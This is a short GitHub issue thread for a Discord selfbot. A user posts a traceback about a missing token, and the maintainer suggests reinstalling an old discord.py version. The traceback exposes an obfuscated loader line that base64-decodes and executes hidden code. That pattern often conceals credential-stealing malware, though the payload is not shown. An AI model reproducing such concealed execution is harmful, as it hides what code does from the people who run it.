### ISSUE TITLE
how to fix

### ISSUE THREAD

**Issue by kc6090** [TheAxes/AxeSelfbot#15]
Traceback (most recent call last):                                                        File "/data/data/com.termux/files/home/AxeSelfbot/main.py", line 16, in <module>
    eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'<string>','exec'))       File "<string>", line 1018, in <module>                                                 File "/data/data/com.termux/files/usr/lib/python3.11/site-packages/discord/client.py", line 723, in run                                                                           return future.result()
           ^^^^^^^^^^^^^^^                                                                File "/data/data/com.termux/files/usr/lib/python3.11/site-packages/discord/client.py", line 702, in runner
    await self.start(*args, **kwargs)                                                     File "/data/data/com.termux/files/usr/lib/python3.11/site-packages/discord/client.py", line 665, in start
    await self.login(*args, bot=bot)                                                      File "/data/data/com.termux/files/usr/lib/python3.11/site-packages/discord/client.py", line 511, in login
    await self.http.static_login(token.strip(), bot=bot)                                                                 ^^^^^^^^^^^                                            AttributeError: 'NoneType' object has no attribute 'strip'

**Comment by TheAxes** [comment]
Type this and enter
pip uninstall discord
and then type this and enter
pip install discord.py==1.7.3
